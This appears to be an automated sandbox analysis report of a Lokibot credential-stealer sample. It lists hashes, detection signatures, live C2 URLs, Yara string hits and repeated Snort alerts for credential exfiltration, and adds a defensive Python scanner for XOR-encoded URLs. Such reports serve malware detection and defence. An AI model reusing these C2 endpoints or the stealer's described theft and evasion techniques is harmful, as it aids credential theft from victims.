
Analysis Report FJbeidnZOF.exe

Overview

General Information

Sample Name: FJbeidnZOF.exe
Analysis ID: 399798
MD5: 0b43c829af2eb773a3614b02ba5b8c5f
SHA1: bc55a69ca1a72f9f0761112c05b3938aebad1c43
SHA256: 25b6f68e2bf505cfde67c533f5d12e869b30efe831fa82fd91c2c29f59fc77ac
Tags: exe, Loki

Detection

Lokibot
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Lokibot
C2 URLs / IPs found in malware configuration
Found C&C like URL pattern
Injects a PE file into a foreign process
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Startup

  • System is w10x64
  • FJbeidnZOF.exe (PID: 5392 cmdline: 'C:\Users\user\Desktop\FJbeidnZOF.exe' MD5: 0B43C829AF2EB773A3614B02BA5B8C5F)
    • FJbeidnZOF.exe (PID: 5472 cmdline: C:\Users\user\Desktop\FJbeidnZOF.exe MD5: 0B43C829AF2EB773A3614B02BA5B8C5F)
  • cleanup

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://amrp.tw/kayo/gate.php"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp | Lokibot | detect Lokibot in memory | JPCERT/CC Incident Response Group |
  • 0x2007af: $des3: 68 03 66 00 00
  • 0x204ba0: $param: MAC=%02X%02X%02XINSTALL=%08X%08X
  • 0x204c6c: $string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000005.00000002.476469367.0000000000400000.00000040.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
(15 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth |
  • 0x28ecc: $s1: http://
  • 0x2c687: $s1: http://
  • 0x2d0e0: $s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x28ed4: $s2: https://
  • 0x28ecc: $f1: http://
  • 0x2c687: $f1: http://
  • 0x28ed4: $f2: https://
1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security |
1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security |
1.2.FJbeidnZOF.exe.2592e78.1.raw.unpack | Loki_1 | Loki Payload | kevoreilly |
  • 0x28e08: $a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
  • 0x29050: $a2: last_compatible_version
(21 further entries not shown)
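The SUSP_XORed_URL_in_EXE hit at 0x2d0e0 above is the string http:// XORed with the single byte 0xFF (0x68 ^ 0xFF = 0x97, 0x74 ^ 0xFF = 0x8B, and so on), which is why the rule reports raw bytes instead of text. The Python below is an added example, not part of this report and not the rule's own code: it reimplements the rule's idea as a scanner that tries all 256 single-byte keys, recovers the key for the bytes the report shows, and decodes the URL that follows each encoded prefix. The buffer it scans is constructed here from one cleartext C2 URL taken from the extracted configuration and one XOR-encoded URL under a hypothetical host (example.invalid).

```python
# Added example: single-byte-XOR URL scanner in the spirit of SUSP_XORed_URL_in_EXE.
# Not the rule's or the report's own code. The scanned buffer is constructed below.
from typing import List, Tuple

PREFIXES = (b"http://", b"https://")

# The raw bytes the report shows for the $s1 hit at 0x2d0e0 in the unpacked PE.
PAGE_MATCH = b"\x97\x8B\x8B\x8F\xC5\xD0\xD0"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single-byte key."""
    return bytes(b ^ key for b in data)


def recover_key(xored_prefix: bytes) -> int:
    """Return the single-byte key k for which xored_prefix ^ k == b'http://'.
    Raises ValueError if no key works (the bytes are not an XORed http://)."""
    for key in range(256):
        if xor_bytes(xored_prefix[:7], key) == b"http://":
            return key
    raise ValueError("not a single-byte XORed http:// prefix")


def find_xored_urls(buf: bytes, min_len: int = 8) -> List[Tuple[int, int, bytes]]:
    """Locate every single-byte-XOR encoded http:// or https:// prefix in buf.

    Returns (offset, key, decoded_url) triples sorted by offset. Key 0 is
    included, so cleartext URLs are reported too. The decoded URL runs from the
    prefix up to the first byte that does not decode to printable ASCII."""
    hits = []
    for key in range(256):
        for prefix in PREFIXES:
            needle = xor_bytes(prefix, key)
            start = 0
            while True:
                off = buf.find(needle, start)
                if off < 0:
                    break
                end = off
                while end < len(buf) and 0x21 <= (buf[end] ^ key) <= 0x7E:
                    end += 1
                decoded = xor_bytes(buf[off:end], key)
                if len(decoded) >= min_len:
                    hits.append((off, key, decoded))
                start = off + 1
    return sorted(hits)


# Constructed test buffer: padding, a cleartext C2 URL from the extracted
# configuration, more padding, then a URL under a hypothetical host XORed with 0xFF.
CLEAR_URL = b"http://kbfvzoboss.bid/alien/fre.php"
HIDDEN_URL = b"http://example.invalid/gate.php"      # hypothetical, not from the report
SAMPLE_BUF = (
    b"\x00" * 16
    + CLEAR_URL + b"\x00"
    + b"\x00" * 8
    + xor_bytes(HIDDEN_URL, 0xFF) + b"\xFF"          # 0xFF ^ 0xFF decodes to a NUL terminator
)


def scan_sample() -> List[Tuple[int, int, bytes]]:
    """Run the scanner over the constructed buffer."""
    return find_xored_urls(SAMPLE_BUF)


if __name__ == "__main__":
    print("key for the report's 0x2d0e0 match: 0x%02X" % recover_key(PAGE_MATCH))
    for off, key, url in scan_sample():
        print("0x%06x key=0x%02X %s" % (off, key, url.decode("ascii")))
```

On the constructed buffer the scanner reports the cleartext C2 URL at offset 16 with key 0 and the hidden URL at offset 60 with key 0xFF. The same approach is what makes the Yara `xor(0x01-0xff)` modifier cheap: the needle is only seven bytes, so trying every key is 256 substring searches, not a decryption of the whole file.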

                Sigma Overview

                No Sigma rule has matched

                Signature Overview


                AV Detection:

Antivirus detection for URL or domain
Source: http://amrp.tw/kayo/gate.php | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000001.00000002.238998741.0000000003529000.00000004.00000001.sdmp | Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://amrp.tw/kayo/gate.php"]}
Multi AV Scanner detection for domain / URL
Source: amrp.tw | Virustotal: Detection: 19%
Source: http://amrp.tw/kayo/gate.php | Virustotal: Detection: 20%
Multi AV Scanner detection for submitted file
Source: FJbeidnZOF.exe | Virustotal: Detection: 22%
Source: FJbeidnZOF.exe | ReversingLabs: Detection: 27%
Machine Learning detection for sample
Source: FJbeidnZOF.exe | Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 1.2.FJbeidnZOF.exe.37167b0.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Uses 32bit PE files
Source: FJbeidnZOF.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: FJbeidnZOF.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\FJbeidnZOF.exe | Code function: 5_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW

                Networking:

                barindex
                Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49721 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49721 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49721 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.3:49723 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49723 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49723 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.3:49723 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49723 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49725 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49725 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49725 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49725 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49725 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49726 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49726 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49726 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49726 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49726 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49727 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49727 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49727 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49727 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49727 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49730 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49730 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49730 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49731 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49731 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49731 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49733 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49733 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49733 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49733 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49733 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49734 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49734 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49734 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49734 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49734 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49738 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49738 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49738 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49738 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49738 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49739 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49739 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49739 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49739 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49739 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49740 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49740 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49740 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49740 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49740 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49741 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49741 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49741 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49741 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49741 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49742 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49742 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49742 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49742 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49742 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49743 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49743 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49743 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49743 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49743 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49744 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49744 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49744 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49744 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49744 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49745 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49745 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49745 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49745 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49745 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49746 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49746 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49746 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49746 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49746 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49747 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49747 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49747 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49747 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49747 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49748 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49748 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49748 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49748 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49748 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49749 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49749 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49749 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49749 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49749 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49750 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49750 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49750 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49750 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49750 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49753 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49753 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49753 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49753 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49753 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49754 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49754 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49754 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49754 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49754 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49755 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49755 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49755 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49755 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49755 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49756 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49756 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49756 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49756 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49756 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49757 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49757 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49757 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49757 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49757 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49758 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49758 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49758 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49758 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49758 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49759 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49759 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49759 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49759 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49759 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49760 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49760 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49760 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49760 -> 35.247.234.230:80
                Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49760 -> 35.247.234.230:80
